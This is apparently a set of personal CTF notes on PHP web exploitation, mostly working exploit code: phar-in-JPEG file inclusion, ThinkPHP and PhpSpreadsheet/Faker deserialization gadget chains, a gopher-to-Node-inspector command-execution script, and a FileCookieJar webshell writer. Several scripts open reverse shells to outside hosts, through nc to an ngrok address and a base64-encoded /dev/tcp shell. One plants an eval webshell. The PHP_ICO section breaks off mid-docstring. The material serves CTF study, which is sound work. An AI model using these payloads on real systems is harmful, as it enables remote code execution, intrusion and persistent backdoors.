    ?>
    

    solve

    import httpx
    
    URL = "http://awkw4ard-1.play.hfsc.tf/"
    # URL = "http://localhost:4444/"
    
    class BaseAPI:
        def __init__(self, url=URL) -> None:
            self.c = httpx.Client(base_url=url, timeout=999)
        def interface(self, interface):
            return self.c.post("/", data={"interface": interface})
    
    class API(BaseAPI):
        ...
    
    if __name__ == "__main__":
        api = API()
        res = api.interface("nc${IFS}0.tcp.ngrok.io${IFS}17197${IFS}-e${IFS}sh {}BEGIN{system(iface)}#")
        print(res.text)
    

    symlink trick if there’s blocked function

    sasctf-quals-2024/tasks/web-binary-options/writeup/exploit.py at main · Team-Drovosec/sasctf-quals-2024 (github.com)

    param_payload = ".ini_set('display_errors', 1).symlink($_FILES['file']['tmp_name'], '/var/www/html/file.shtml').virtual('file.shtml').die()."

    PHP Trick Using File Upload if File Upload is Restricted to Non-PHP File Types Like PNG or JPEG

    CODEGATE 2024

    vulnerable code

    related: business-ctf-2024/web/[Medium] Magicom at main · hackthebox/business-ctf-2024 (github.com)

    $poll_skin_path = "$g4[path]/skin/poll/$skin_dir";
    if (!file_exists("$poll_skin_path/poll_result.skin.php")) die("skin error");
    include_once ("$poll_skin_path/poll_result.skin.php");
    
  • misal $g4[path]=phar:/ dan $skin_dir=../../[path ke gambar]/gambar.jpg/poll_result.skin.php
  • 2024-06-02T09:28:00.000+08:00

      entar dia include phar://skin/poll/../../[path ke gambar]/gambar.jpg/poll_result.skin.php

  • 2024-06-02T09:28:00.000+08:00

      anjir gampang

  • import httpx
    import base64
    import hashlib
    import os
    URL = "http://13.125.178.249/"
    
    class BaseAPI:
        def __init__(self, url=URL) -> None:
            self.c = httpx.Client(base_url=url)
        def config(self, g4_path):
            return self.c.post("/cheditor5/imageUpload/_config.php", data={"_SERVER[g4_path]": g4_path})
        def upload(self, file):
            return self.c.post("/cheditor5/imageUpload/upload.php", files={"file": file})
        def index(self, sst):
            return self.c.post("/adm/index.php", data={
                "sst": sst,
                "_SERVER[g4_path]": "x",
            })
        def version(self, g4_path, ):
            return self.c.post("/adm/version.php", data={
                "_SERVER[g4_path]": g4_path,
                "sub_menu": "0",
                "auth[0]": "r",
                "_SERVER[SERVER_ADDR]": "a",
                "_SERVER[REMOTE_ADDR]": "a",
                "_SERVER[HTTP_USER_AGENT]": "a",
                }, cookies={
                    hashlib.md5(b"ck_mb_id").hexdigest(): base64.b64encode(b"admin").decode(),
                    hashlib.md5(b"ck_auto").hexdigest(): base64.b64encode(b"47bce5c74f589f4867dbd57e9ca9f808").decode()
                })
        def poll_result(self, filePath):
            return self.c.post("/bbs/poll_result.php", data={
                "skin_dir": filePath,
                "_SERVER[g4_path]": "phar:/",
                "po_id": 1,
            })
    
    class API(BaseAPI):
        ...
    with open("payload.php", "wb") as f:
        payload = r"""<?php
    $jpeg_header_size =
    "\xff\xd8\xff\xe0\x00\x10\x4a\x46\x49\x46\x00\x01\x01\x01\x00\x48\x00\x48\x00\x00\xff\xfe\x00\x13".
    "\x43\x72\x65\x61\x74\x65\x64\x20\x77\x69\x74\x68\x20\x47\x49\x4d\x50\xff\xdb\x00\x43\x00\x03\x02".
    "\x02\x03\x02\x02\x03\x03\x03\x03\x04\x03\x03\x04\x05\x08\x05\x05\x04\x04\x05\x0a\x07\x07\x06\x08\x0c\x0a\x0c\x0c\x0b\x0a\x0b\x0b\x0d\x0e\x12\x10\x0d\x0e\x11\x0e\x0b\x0b\x10\x16\x10\x11\x13\x14\x15\x15".
    "\x15\x0c\x0f\x17\x18\x16\x14\x18\x12\x14\x15\x14\xff\xdb\x00\x43\x01\x03\x04\x04\x05\x04\x05\x09\x05\x05\x09\x14\x0d\x0b\x0d\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14".
    "\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\x14\xff\xc2\x00\x11\x08\x00\x0a\x00\x0a\x03\x01\x11\x00\x02\x11\x01\x03\x11\x01".
    "\xff\xc4\x00\x15\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xff\xc4\x00\x14\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xda\x00\x0c\x03".
    "\x01\x00\x02\x10\x03\x10\x00\x00\x01\x95\x00\x07\xff\xc4\x00\x14\x10\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xff\xda\x00\x08\x01\x01\x00\x01\x05\x02\x1f\xff\xc4\x00\x14\x11".
    "\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xff\xda\x00\x08\x01\x03\x01\x01\x3f\x01\x1f\xff\xc4\x00\x14\x11\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20".
    "\xff\xda\x00\x08\x01\x02\x01\x01\x3f\x01\x1f\xff\xc4\x00\x14\x10\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xff\xda\x00\x08\x01\x01\x00\x06\x3f\x02\x1f\xff\xc4\x00\x14\x10\x01".
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xff\xda\x00\x08\x01\x01\x00\x01\x3f\x21\x1f\xff\xda\x00\x0c\x03\x01\x00\x02\x00\x03\x00\x00\x00\x10\x92\x4f\xff\xc4\x00\x14\x11\x01\x00".
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xff\xda\x00\x08\x01\x03\x01\x01\x3f\x10\x1f\xff\xc4\x00\x14\x11\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xff\xda".
    "\x00\x08\x01\x02\x01\x01\x3f\x10\x1f\xff\xc4\x00\x14\x10\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xff\xda\x00\x08\x01\x01\x00\x01\x3f\x10\x1f\xff\xd9";
    
    $phar = new Phar('payload.phar');
    $phar->startBuffering();
    $phar->addFromString('poll_result.skin.php', '<?php system("cat /f*"); ?>');
    $phar->setStub($jpeg_header_size."\n<?php __HALT_COMPILER(); ?>");
    $phar->stopBuffering();"""
        f.write(payload.encode())
    
    os.system("php --define phar.readonly=0 payload.php")
    
    
    if __name__ == "__main__":
        # Script entry point: drive the target through the project-local API helper.
        api = API()
        # NOTE(review): presumably repoints the poll skin directory so the uploaded
        # archive can later be resolved as a skin — confirm against API.config.
        res = api.config("../../bbs/skin/poll/")
        print(res.text)
        # Read the generated phar through a context manager so the file handle is
        # closed deterministically (the original left it open until GC).
        with open("payload.phar", "rb") as phar_file:
            phar_bytes = phar_file.read()
        # The archive is uploaded under an image file name.
        res = api.upload(("payload.png", phar_bytes))
        # Keep only the part of the returned path that follows the last "/../".
        filePath = res.json()["filePath"].split("/../")[-1]
        res = api.poll_result("../../../"+filePath)
        print(res.text)
    
     

    PHP Deserialization Trick Using Call

    If a method that is called on an object does not exist (or is not accessible) in its class, PHP invokes the class's __call magic method instead.

    example challenge:

    8TH XCTF Finals

    Solver

    <?php
    
    // Stand-in declarations for the think\route classes that appear in the payload.
    // Only the properties that have to be serialized are declared here.
    // NOTE(review): presumably these mirror the target framework's real classes — confirm.
    namespace think\route {
        // Outermost object of the serialized payload; it only wraps $resource.
        class ResourceRegister
        {
            public $resource;
            public function __construct($resource)
            {
                $this->resource = $resource;
            }
        }
        // Base class carrying the rule data; declared abstract, so only subclasses are instantiated.
        abstract class Rule
        {
            public $rest = ['key' => [1 => '<id>']];
            public $name = "name";
            public $rule;
            public $router;
            public $option;
            public function __construct($rule, $router, $option)
            {
                $this->rule = $rule;
                $this->router = $router;
                // The attacker-supplied object is nested under option['var']['nivia'].
                $this->option = ['var' => ['nivia' => $option]];
            }
        }
        // Pass-through subclass: forwards its arguments to Rule unchanged.
        class RuleGroup extends Rule
        {
            public function __construct($rule, $router, $option)
            {
                parent::__construct($rule, $router, $option);
            }
    
        }
    
        // Concrete class instantiated by the script below; also a pure pass-through.
        class Resource extends RuleGroup
        {
            public function __construct($rule, $router, $option)
            {
                parent::__construct($rule, $router, $option);
            }
        }
    }
    // Stand-ins for the think\* classes referenced by the payload.
    namespace think {
        // Empty placeholder passed as the $router argument.
        class Route
        {
        }
        // Holds the two attacker-chosen values: $visible and $relation.
        abstract class Model
        {
            private $relation;
            protected $append = ['Nivia' => "1.2"];
            protected $visible;
            public function __construct($visible, $call)
            {
                // $visible is stored under key 1, $call under key '1'.
                $this->visible = [1 => $visible];
                $this->relation = ['1' => $call];
            }
        }
        // Carries the name of the PHP function to be invoked ("system").
        class Validate
        {
            protected $type;
            public function __construct()
            {
                $this->type = ['visible' => "system"];//function
            }
        }
    }
    // Concrete Model subclass, needed because think\Model is abstract.
    namespace think\model {
        use think\Model;
    
        class Pivot extends Model
        {
            // Forwards both arguments to Model::__construct unchanged.
            public function __construct($visible, $call)
            {
                parent::__construct($visible, $call);
            }
        }
    }
    // Stand-in for Symfony's ConstStub; it inherits the public $value from Stub.
    // NOTE(review): presumably chosen because the real class can be cast to a string — confirm.
    namespace Symfony\Component\VarDumper\Caster {
        use Symfony\Component\VarDumper\Cloner\Stub;
    
        class ConstStub extends Stub
        {
        }
    }
    // Stand-in for Symfony's Stub; $value holds the command string to execute.
    namespace Symfony\Component\VarDumper\Cloner {
        class Stub
        {
            public $value = "google-chrome"; //cmd
        }
    }
    // Assemble the object graph and print it as a base64-encoded serialized string.
    namespace {
        // Validate carries the function name; ConstStub carries the command string.
        $call = new think\Validate;
        $option = new think\model\Pivot(new Symfony\Component\VarDumper\Caster\ConstStub, $call);
        $router = new think\Route;
        // The suffix of "abc.nivia" matches the 'nivia' key that Rule stores $option under.
        $resource = new think\route\Resource("abc.nivia", $router, $option);
        $resourceRegister = new think\route\ResourceRegister($resource);
        echo base64_encode(serialize($resourceRegister));
    }

    Without Symfony: trigger __toString via a built-in class instead

    <?php
    
    // Stand-in declarations for the think\route classes that appear in the payload.
    // Only the properties that have to be serialized are declared here.
    // NOTE(review): presumably these mirror the target framework's real classes — confirm.
    namespace think\route {
        // Outermost object of the serialized payload; it only wraps $resource.
        class ResourceRegister
        {
            public $resource;
            public function __construct($resource)
            {
                $this->resource = $resource;
            }
        }
        // Base class carrying the rule data; declared abstract, so only subclasses are instantiated.
        abstract class Rule
        {
            public $rest = ['key' => [1 => '<id>']];
            public $name = "name";
            public $rule;
            public $router;
            public $option;
            public function __construct($rule, $router, $option)
            {
                $this->rule = $rule;
                $this->router = $router;
                // The attacker-supplied object is nested under option['var']['nivia'].
                $this->option = ['var' => ['nivia' => $option]];
            }
        }
        // Pass-through subclass: forwards its arguments to Rule unchanged.
        class RuleGroup extends Rule
        {
            public function __construct($rule, $router, $option)
            {
                parent::__construct($rule, $router, $option);
            }
    
        }
    
        // Concrete class instantiated by the script below; also a pure pass-through.
        class Resource extends RuleGroup
        {
            public function __construct($rule, $router, $option)
            {
                parent::__construct($rule, $router, $option);
            }
        }
    }
    // Stand-ins for the think\* classes referenced by the payload.
    namespace think {
        // Empty placeholder passed as the $router argument.
        class Route
        {
        }
        // Holds the two attacker-chosen values: $visible and $relation.
        abstract class Model
        {
            private $relation;
            protected $append = ['Nivia' => "1.2"];
            protected $visible;
            public function __construct($visible, $call)
            {
                // $visible is stored under key 1, $call under key '1'.
                $this->visible = [1 => $visible];
                $this->relation = ['1' => $call];
            }
        }
        // Carries the name of the PHP function to be invoked ("system").
        class Validate
        {
            protected $type;
            public function __construct()
            {
                $this->type = ['visible' => "system"];//function
            }
        }
    }
    // Concrete Model subclass, needed because think\Model is abstract.
    namespace think\model {
        use think\Model;
    
        class Pivot extends Model
        {
            // Forwards both arguments to Model::__construct unchanged.
            public function __construct($visible, $call)
            {
                parent::__construct($visible, $call);
            }
        }
    }
    
    // Same object graph as the Symfony variant, but the command is carried by a
    // built-in Error object instead of a Symfony stub.
    namespace {
        $call = new think\Validate;
        // The command is wrapped in newlines inside the Error message.
        // NOTE(review): presumably so it sits on its own line when the Error is cast
        // to a string and handed to the shell — confirm.
        $option = new think\model\Pivot(new Error("\ngoogle-chrome\n"), $call);
        $router = new think\Route;
        $resource = new think\route\Resource("abc.nivia", $router, $option); //trigger to string in Pivot
        $resourceRegister = new think\route\ResourceRegister($resource);
        echo base64_encode(serialize($resourceRegister));
    }
    

    The exploitation can be roughly simplified to something like this:

    <?php
    namespace will\you\call\me {
        // Gadget class: any call to a missing or inaccessible method is routed to __call.
        class CallMe
        {
            // Private, so it cannot be called from outside the class directly.
            private function pleaseCallMe($val, $key)
            {
                return call_user_func($val, $key);
            }
            // Treats the requested method name as a callable and invokes it with the
            // original arguments.
            public function __call($method, $args)
            {
                return call_user_func_array($method, $args);
            }
        }
    }
    
    namespace iam\noone {
        // Harmless class: nobody() only echoes its argument.
        class Noone
        {
            public function nobody($cash)
            {
                echo "thanks for your cash $cash";
            }
        }
    }
    
    namespace world\will\call\me {
        use iam\noone\Noone;
    
        // String-conversion gadget: casting an instance to string calls nobody() on $callMe.
        class StrongestSorcerer
        {
            // Declared with the Noone type.
            private Noone $callMe;
            private $cash = 0;
            // PHP method names are case-insensitive, so this is the __toString magic method.
            public function __tostring()
            {
                if (isset($this->callMe)) {
                    if (is_string($this->callMe)) {
                        // Intentionally empty: string values are ignored.
                    } else {
                        $this->callMe->nobody($this->cash);
                    }
                }
                return "World strongest sorcerer";
            }
        }
    }
    
    namespace because\iam\strong\after\all {
        // Base class providing the two protected properties read by Stringify.
        abstract class DomainExpansion
        {
            protected $domain;
            protected $juliet;
        }
    }
    
    namespace idwin\really\idwillwin {
        use because\iam\strong\after\all\DomainExpansion;
    
        // Entry gadget: the destructor may cast $domain to a string.
        class Stringify extends DomainExpansion
        {
            public $romeo;
            // Interpolates $s into a string (invoking __toString on objects), but only
            // when $juliet loosely equals $romeo; otherwise returns null implicitly.
            private function IamString($s)
            {
                if ($this->juliet == $this->romeo){
                    return "$s";
                }
            }
            // $romeo is overwritten with 100 random bytes immediately before the comparison.
            // NOTE(review): presumably the intended bypass makes $juliet a serialized
            // reference to $romeo so the two stay equal — confirm.
            public function __destruct()
            {
                $this->romeo = random_bytes(100);
                $this->IamString($this->domain);
            }
        }
    }
    
    // Challenge entry point.
    namespace {
        // Deserialization only happens when the 'ops' value from $_GET differs from
        // the one in $_REQUEST.
        if (isset($_GET['ops']) && isset($_REQUEST['ops'])) {
            if ($_GET['ops'] != $_REQUEST['ops']) {
                // SECURITY: unserialize() on request data — this is the intended vulnerability.
                unserialize($_REQUEST['ops']);
            }
        }
        // Prints this file's own source.
        highlight_file(__FILE__);
    }

    Date function xss

    // Every letter is backslash-escaped so date() emits it literally instead of
    // expanding it as a format character; the result is <img src=x onerror=alert(1)>.
    date('<\i\m\g \s\r\c=\x \o\n\e\r\r\o\r=\a\l\e\r\t(1)>');

    PHP file execution through a CVE, then sending WebSocket frames using gopher

    8TH XCTF Final

    PHP Development Server <= 7.4.21 - Remote Source Disclosure (projectdiscovery.io)

    import bitstruct
    import requests
    import json
    
    base = 'http://172.22.177.166:64000'
    proxy = f'{base}/proxy_v2.dev.php'
    
    def get_id():
        """Return the ``id`` of the first entry listed at ``http://127.0.0.1:9229/json``.

        The URL is fetched on our behalf by the remote ``proxy`` endpoint.
        """
        response = requests.post(proxy, data={'uri': 'http://127.0.0.1:9229/json'})
        targets = response.json()
        return targets[0]['id']
    
    def get_mtu():
        """Return the loopback MTU, read from ``/sys/class/net/lo/mtu`` via the proxy."""
        form = {'uri': 'file:///sys/class/net/lo/mtu'}
        response = requests.post(proxy, data=form)
        mtu_text = response.text
        return int(mtu_text)
    
    def read(uri):
        """Ask the proxy endpoint to fetch *uri* and return the response body as text."""
        response = requests.post(proxy, data={'uri': uri})
        return response.text
    
    def make_req(_req):
        """Join the request lines with CRLF, add the blank line that ends the headers, and encode to bytes."""
        crlf = '\r\n'
        raw_request = crlf.join(_req) + crlf * 2
        return raw_request.encode()
    
    def enc(data):
        """Percent-encode every byte of *data* as a two-digit lowercase ``%xx`` escape."""
        return ''.join('%' + hex(byte)[2:].zfill(2) for byte in data)
    
    def make_gopher(ip, port, data):
        """Build a ``gopher://`` URL whose selector is the percent-encoded *data*.

        *data* must not contain NUL bytes.
        """
        assert b'\x00' not in data
        encoded = enc(data)
        return 'gopher://{}:{}/_{}'.format(ip, port, encoded)
    
    def make_websocket_text_frame(data):
        """Build one final, masked WebSocket text frame around *data*.

        The frame always uses the 16-bit extended length form (length marker 126),
        so *data* must be between 126 and 65535 bytes long. Returns a bytearray.
        """
        assert 126 <= len(data) < 2 ** 16
        mask_key = b'\xfe\xfe\xfe\xfe'
        # Fields in wire order: FIN(1) RSV(3) OPCODE(4) MASK(1) LEN(7) EXT_LEN(16) KEY(32).
        header = bitstruct.pack('>u1u3u4u1u7u16r32', 1, 0, 1, 1,
            126, len(data), mask_key)
        # Masking XORs each payload byte with the key byte at the same position mod 4.
        masked = bytearray(data)
        for pos, byte in enumerate(masked):
            masked[pos] = byte ^ mask_key[pos % 4]
        frame = bytearray()
        frame += header
        frame += masked
        return frame
    
    # Look up the id of the first listed target and the loopback MTU through the proxy.
    _id = get_id()
    mtu = get_mtu()
    # Raw HTTP request that upgrades the connection to a WebSocket on /<id>.
    req = make_req([
        f'GET /{_id} HTTP/1.1',
        'Sec-WebSocket-Version: 13',
        'Sec-WebSocket-Key: NMtM5Mt1C7TYIF3JMw9G8w==',
        'Connection: Upgrade',
        'Upgrade: websocket',
        'Content-Length: 0',
        'Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits',
        'Host: 127.0.0.1:9229'
    ])
    
    # Not referenced anywhere else in the visible script.
    empty_text_frame = bytes.fromhex('818081808180')
    padding_len = 0x50
    # Base64-encoded shell command, decoded and piped to bash on the target.
    cmd = 'echo L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xMDEuMjAwLjIwMi4yMTYvNjUwMDEgMD4mMQ== | base64 -d | bash'
    # The trailing //AAAA… is a JavaScript comment used as padding.
    # NOTE(review): presumably it keeps the JSON payload at or above the 126-byte
    # minimum enforced by make_websocket_text_frame — confirm.
    express = f'require("child_process").execSync("{cmd}");//{"A" * padding_len}'
    # Message asking the remote debugger to evaluate the expression above.
    exp = {
        "id": 1,
        "method": "Runtime.evaluate",
        "params": {
            "expression": express,
            "includeCommandLineAPI": True
        }
    }
    exp_text_frame = make_websocket_text_frame(json.dumps(exp).encode())
    # The upgrade request is padded with 'A' bytes up to the MTU before the frame is appended.
    # NOTE(review): presumably so the frame arrives in a separate TCP segment after
    # the handshake — confirm.
    payload = req + b'A' * (mtu - len(req)) + exp_text_frame
    
    # Deliver everything in one gopher:// request issued by the proxy.
    print(read(make_gopher('127.0.0.1', 9229, payload)))
    

    A misconfiguration like this can lead to arbitrary PHP file inclusion

    tested in

    FROM php:7.4-apache
    
    RUN a2enmod rewrite
    COPY ./src/default.conf /etc/apache2/sites-available/000-default.conf
    COPY ./src/ /var/www/html/
    <VirtualHost *:80>
            # Access is granted for the whole filesystem root, not just the document root.
            <Directory />
                    Require all granted
            </Directory>
    
            ServerAdmin webmaster@localhost
            LogLevel alert rewrite:trace3
            DocumentRoot /var/www/html/
    
            ErrorLog ${APACHE_LOG_DIR}/error.log
            CustomLog ${APACHE_LOG_DIR}/access.log combined
    
            RewriteEngine On
            # Rewrites /<anything>/ to /<anything>.html; the captured part is attacker-controlled.
            # NOTE(review): presumably an encoded "?" (%3f) in the path turns the
            # appended ".html" into a query string, as in the PoC — confirm.
            RewriteRule  ^/(.*)/$ /$1.html
    </VirtualHost>
    

    poc

    http://localhost/usr/local/lib/php/peclcmd.php%3f/

    reference from SCTF 2024 By W&M - W&M Team (wm-team.cn) chall havefun

    Deserialization + File upload if FileCookieJar exist

    https://blog.wm-team.cn/index.php/archives/82/#Simpleshop

    <?php
    // Build 1.phar whose metadata is a Guzzle FileCookieJar pointing at public/shell.php.
    // NOTE(review): presumably the jar writes its cookies to that path when it is
    // destroyed after deserialization on the target — confirm against Guzzle.
    require __DIR__ . '/vendor/autoload.php';

    use GuzzleHttp\Cookie\FileCookieJar;
    use GuzzleHttp\Cookie\SetCookie;

    $obj = new FileCookieJar('public/shell.php');
    // The PHP payload is carried in the cookie's Domain field. It deliberately
    // contains no quote characters, so do not "fix" the bare constant a.
    $payload = '<?php eval(filter_input(INPUT_POST,a)); ?>';
    $obj->setCookie(new SetCookie([
        'Name' => 'foo',
        "Value" => "1",
        'Domain' => $payload,
        "a" => 'bar',
        'Expires' => time()
    ]));

    $phar = new \Phar("1.phar");
    $phar->startBuffering();
    // The GIF89a prefix makes the archive start with GIF magic bytes.
    $phar->setStub('GIF89a'."__HALT_COMPILER();");
    $phar->setMetadata($obj);
    $phar->addFromString("test.txt", "test");
    $phar->stopBuffering();
    ?>

    XSS in 302 redirect

    Forcing Firefox to Execute XSS Payloads during 302 Redirects | Gremwell

    Some Faker __call chain

    my writeup Exploitation

    other

    PHP POP Chain

    o-o.ee/Patchstack-Alliance-CTF-S01E01/#h.otluyykmfb7g

    Our entrypoint is in \PhpOffice\PhpSpreadsheet\Collection\Cells class

    // Quoted library code: on destruction, deleteMultiple() is called on $this->cache
    // with the result of getAllCacheKeys().
    public function __destruct(){
    
       $this->cache->deleteMultiple($this->getAllCacheKeys());
    
    }

    That might allow us controlling an arbitrary middle object, but alas, this is not the case this time.

    Next we have the getAllCacheKeys() method call, that

    // Quoted library code: builds one key per entry of $this->index.
    private function getAllCacheKeys(){
    
       $keys = [];
    
       foreach ($this->index as $coordinate => $value) {
    
           // String concatenation: if cachePrefix is an object it is cast to a
           // string here, which invokes its __toString().
           $keys[] = $this->cachePrefix . $coordinate;
    
       }
    
       return implode(',', $keys);
    
    }

    Allows us getting a __toString() call on the $this->cachePrefix object

    Setting the cachePrefix to \PhpOffice\PhpSpreadsheet\Comment instance

    // Quoted library code: string conversion delegates to getPlainText() on
    // whatever object is stored in $this->text.
    public function __toString(): string {
    
       return $this->text->getPlainText();
    
    }

    This allows us another call (now looking at it, this might have been maybe possible already on the previous step… oh-well, not going back to test now 😁)

    Anyway, setting the text parameter to \Faker\ValidGenerator, we reach this super cool (and from defender's perspective super dangerous) function, that triggers, whenever the object is missing the method to handle the call.

    Luckily, the ValidGenerator doesn't implement a function getPlainText, so we're good.

    // Quoted library code: forwards the unknown method call to $this->generator and
    // repeats until $this->validator accepts the result.
    public function __call($name, $arguments){
    
       $i = 0;
    
       do {
    
           $res = call_user_func_array([$this->generator, $name], $arguments);
    
           ++$i;
    
    
           // Give up once the retry budget is exceeded.
           if ($i > $this->maxRetries) {
    
               throw new \OverflowException(sprintf('Maximum retries of %d reached without finding a valid value', $this->maxRetries));
    
           }
    
       // The validator is invoked as a callable with the generated value as its only argument.
       } while (!call_user_func($this->validator, $res));
    
    
       return $res;
    
    }
    
    

    Next we need to somehow control the function and argument, which we can do if we set the generator and validator

    We can achieve our code execution via the

    (!call_user_func($this->validator, $res));

    Because the validator parameter we can control. Next we need few more things. We need to reach the block without throwing an error, which means that something needs to receive the getPlainText call and answer without failing. Bypassing the maxRetries is trivial, since we control the parameter. Further, since the validator gets the same $res parameter as the argument, we need to also control the output of

    call_user_func_array([$this->generator, 'getPlainText']

    Luckily, the Faker has another trick in our favour -> \Faker\DefaultGenerator that has

    // Quoted library code: every unknown method call returns $this->default,
    // regardless of the method name or arguments.
    public function __call($method, $attributes)
    {
       return $this->default;
    }

    I have discovered, that is useful to have the "Faked" classes and "Original" classes side-by-side. Given that the serialized output is a string, I can simply do some string replacements to be able to target the original classes (obviously I cannot use Maker and ShpOffice anywhere else in the payload) 🤷

    This is

    <?php
    
    
    // Stand-ins for the Faker classes; "Maker" is replaced with "Faker" in the
    // serialized string by the script's final namespace block.
    namespace Maker {
    
     // Supplies the value that ends up as the argument of the validator call.
     class DefaultGenerator {
    
       private $default;
    
       function __construct() {
    
         $this->default = 'cat /*.txt'; // Argument
    
       }
    
     }
    
     // Holds the generator object and the name of the function used as validator.
     class ValidGenerator {
    
       private $generator;
    
       private $validator;
    
       // Declared but never assigned in this script.
       private $formatters;
    
       private $maxRetries;
    
       function __construct() {
    
         $this->generator = new \Maker\DefaultGenerator();
    
         $this->validator = 'passthru'; // Function
    
         $this->maxRetries = 2;
    
       }
    
     }
    
    }
    
    
    // Empty stand-in used as the Cells::$cache value; "ShpOffice" is replaced with
    // "PhpOffice" after serialization.
    namespace ShpOffice\PhpSpreadsheet\Collection\Memory {
    
     class SimpleCache3 {
    
     }
    
    }
    
    
    // Stand-in used as the Cells::$parent value.
    // NOTE(review): the class is declared inside a namespace that itself ends in
    // "\Worksheet", so its full name ends in "\Worksheet\Worksheet\Worksheet" —
    // confirm this matches the intended target class.
    namespace ShpOffice\PhpSpreadsheet\Worksheet\Worksheet{
    
     class Worksheet{
    
       private $parent;
    
       // Intentionally empty: $parent stays null.
       function __construct() {
    
       }
    
     }
    
    }
    
    
    // Stand-in for the Comment class; $text holds the ValidGenerator stand-in that
    // receives the method call made during string conversion.
    namespace ShpOffice\PhpSpreadsheet {
    
     class Comment {
    
       public $text;
    
       function __construct() {
    
         $this->text = new \Maker\ValidGenerator();
    
       }
    
     }
    
    }
    
    
    
    // Stand-in for the Cells class, the entry point of the chain.
    namespace ShpOffice\PhpSpreadsheet\Collection{
    
     class Cells{
    
       private $parent;
    
       private $cache;
    
       private $index;
    
       private $cachePrefix;
    
       function __construct() {
    
         $this->parent = new \ShpOffice\PhpSpreadsheet\Worksheet\Worksheet\Worksheet();
    
         $this->cache = new \ShpOffice\PhpSpreadsheet\Collection\Memory\SimpleCache3();
    
         // An object instead of a string, so that concatenating it triggers __toString().
         $this->cachePrefix = new \ShpOffice\PhpSpreadsheet\Comment();
    
         // One entry is enough to make the key-building loop run once.
         $this->index = [
    
           'a' => 'b'
    
         ];
    
       }
    
     }
    
    }
    
    
    // Serialize the chain, rename the stand-in namespaces to the real ones, and
    // print the URL-encoded payload.
    namespace {
    
     echo "POP chain\n\n";
    
     $part = new \ShpOffice\PhpSpreadsheet\Collection\Cells();
    
     $serialized = (serialize($part));
    
     // Both replacements keep the string length unchanged, so the length prefixes
     // inside the serialized data stay valid.
     $serialized = str_replace('Maker', 'Faker', $serialized);
    
     $serialized = str_replace('ShpOffice', 'PhpOffice', $serialized);
    
     echo urlencode($serialized);
    
     // unserialize($serialized);
    
     die("\n\nEND");
    
    }

    author

    I wonder if you have found the intended chain for the donor challenge yet? Here is my solution:

    import re

    session = requests.session()

    def get_cookies(url):

    def find_flag_filename(cookies,url):

    def get_flag_content(cookies, flag_filename,url):

    def main():

    if __name__ == "__main__":

    Of course, it needs to be changed a bit to match the Patchstack team's flag structure

    <@663394727688798231> <@658787334984171539>

    # PHP request smuggling
    <file src="file://%7B%22source%22%3A%22https%3A%2F%2Fprod-files-secure.s3.us-west-2.amazonaws.com%2F39d1be85-e7c6-4263-a666-a42da95a70df%2F623fe104-d76b-498f-b947-72dcd447fb71%2Fphpnotes-ec604b5d03f9d522_(1).tar.xz%22%2C%22permissionRecord%22%3A%7B%22table%22%3A%22block%22%2C%22id%22%3A%2219548583-e65d-80c0-b834-eab16e581516%22%2C%22spaceId%22%3A%2239d1be85-e7c6-4263-a666-a42da95a70df%22%7D%7D"></file>
    from here: [phpnotes \| hxp 38C3 CTF](https://2024.ctf.link/internal/challenge/b98bbcec-faad-40a0-8efa-e2998039d5be/)
    [phpnotes - hxp 38C3 CTF Web Challenge Writeup \| siunam’s Website](https://siunam321.github.io/ctf/hxp-38C3-CTF/Web/phpnotes/)
    <empty-block/>
    Instead, we (ab)use the fact that the storage backend uses `werkzeug.util.secure_filename` to derive a “secure” filename for the note (without slashes or path traversal, etc.) — but that performs NFKD unicode normalization of the input first, so lots of Unicode characters get converted to normal printable ASCII. You can find normalization tables [here](https://www.unicode.org/charts/normalization/). For example, `ᶠₗₐℊ` (`\u1da0\u2097\u2090\u210a`) will be normalized to `flag`.
    <empty-block/>
    # PHP_ICO [https://github.com/chrisbliss18/php-ico](https://github.com/chrisbliss18/php-ico) / bypass imagecreatefromstring
    You can upload a file containing a specially crafted PNG; it is then saved on the server with your payload in plain text.

    PHP_ICO Exploit Note: Bypassing imagecreatefromstring

    Source: chrisbliss18/php-ico

    Summary

    You can upload a specially crafted PNG file that embeds your payload as plain text.

    The server will save the file with your payload intact, allowing for potential exploitation.

    Proof of Concept

    import httpx
    import asyncio
    import numpy as np
    import cv2
    
    # Base URL of the target application (plain URL — no markdown autolink brackets)
    URL = "http://localhost:8080"
    
    
    class BaseAPI:
        """Holds one ``httpx.AsyncClient`` bound to the target base URL as ``self.c``."""

        def __init__(self, url=URL) -> None:
            client = httpx.AsyncClient(base_url=url)
            self.c = client
    
    
    class API(BaseAPI):
        """Endpoint wrappers for the target application."""

        async def convert_png_to_ico(self, file) -> httpx.Response:
            """POST *file* as the multipart field ``file`` to ``/`` and return the response."""
            multipart = {"file": file}
            response = await self.c.post("/", files=multipart)
            return response
    
    
    def generate_image_from_bits(bits: str, size: tuple, output_file: str):
        """
        Generate an RGBA image from binary bits and save it to a file.

        Every pixel is white. A ``1`` bit becomes a fully transparent pixel
        (alpha 0) and a ``0`` bit a fully opaque one (alpha 255). Pixels beyond
        the end of *bits* are opaque. Bits are laid out left to right, starting
        at the BOTTOM row and moving upwards.

        :param bits: String of ``'0'``/``'1'`` characters to encode into the image.
